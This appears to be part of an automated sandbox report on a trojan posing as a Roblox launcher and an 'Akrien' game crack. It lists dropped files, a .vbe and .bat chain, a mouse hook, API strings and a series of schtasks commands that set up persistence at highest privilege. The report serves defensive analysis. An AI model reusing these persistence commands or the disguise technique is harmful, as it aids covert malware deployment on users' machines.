            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/d
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/d$6
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/v1.0/SequenceStatistics/BatchAddToSequencesV2?apiKey=76E5A4
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/v1.1/Counters/BatchIncrement?apiKey=76E5A40C-3AE1-4028-9F10
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988611713.00000000042BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ephemeralcounters.api.roblox.com/x_age
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005526699.00000000040D7000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042A6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/ersion-d6abc3b106a04c5c-rbxInstallerPkgManifest.txt
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/ve/version-d6abc3b106a04c5c-rbxPkgManifest.txt
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-RobloxPlayerLauncher.exe
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.000000000424B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-RobloxPlayerLauncher.exe_
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txt
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txt6
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txthb
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtL
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtW
            Source: RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtZ
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxPkgManifest.txt
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxPkgManifest.txtP
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxPkgManifest.txtx
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://uploads.backtrace.rbx.com/post
            Source: RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploads.backtrace.rbx.com/post--annotation=RobloxChannel=production--annotation=RobloxGitHas
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploads.backtrace.rbx.com/post2
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drString found in binary or memory: https://uploads.backtrace.rbx.com/postCrashUploadToBacktraceBaseUrla2440b0bfdada85f34d79b43839f2b49e
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploads.backtrace.rbx.com/postD#
            Source: RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploads.backtrace.rbx.com/postT
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: DirectInput8Creatememstr_ecd51bfe-b
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dll

            System Summary

            Source: C:\Users\user\Desktop\RFAwChXSve.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,5_2_00B4718C
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\24ea3b44df2b49
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\en-US\RuntimeBroker.exe
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\en-US\9e8d7a4ca61bd9
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: String function: 009E1C40 appears 40 times
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: String function: 0072DE70 appears 92 times
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: String function: 00B5E28C appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: String function: 00B5E360 appears 52 times
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: String function: 00B5ED00 appears 31 times
            Source: refdhcp.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.0000000003C07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRoblox.exeH vs RFAwChXSve.exe
            Source: RFAwChXSve.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformBlock'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformBlock'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vKVTrVC9rFRJDAycoWs.csCryptographic APIs: 'CreateDecryptor'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformBlock'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, aCPkcGeAnaN6jeReSIt.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, tvuesemHGfryK3qlacm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@52/58@0/5
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A281C0 FormatMessageW,GetLastError,3_2_00A281C0
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00834A80 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_00834A80
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_0073A690 std::ios_base::failure::failure,Concurrency::cancel_current_task,CoCreateInstance,DeleteFileW,3_2_0073A690
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00737330 LoadResource,LockResource,SizeofResource,3_2_00737330
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PCClientBootstrapper[1].json
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeMutant created: NULL
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeMutant created: \Sessions\1\BaseNamedObjects\Local\5999dbe80fd56da6aef80eb55286c73df5d830d3
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
            Source: C:\Users\user\Desktop\RFAwChXSve.exeFile created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCommand line argument: sfxname5_2_00B5D5D4
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCommand line argument: sfxstime5_2_00B5D5D4
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCommand line argument: STARTDLG5_2_00B5D5D4
            Source: RFAwChXSve.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\RFAwChXSve.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\RFAwChXSve.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RFAwChXSve.exeReversingLabs: Detection: 84%
            Source: RFAwChXSve.exeVirustotal: Detection: 93%
            Source: unknownProcess created: C:\Users\user\Desktop\RFAwChXSve.exe "C:\Users\user\Desktop\RFAwChXSve.exe"
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe"
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe"
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe"
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe"
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserfont\refdhcp.exe "C:\Browserfont\refdhcp.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 7 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Browserfont\services.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /f
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserfont\refdhcp.exe "C:\Browserfont\refdhcp.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: bcp47langs.dllJump to behavior
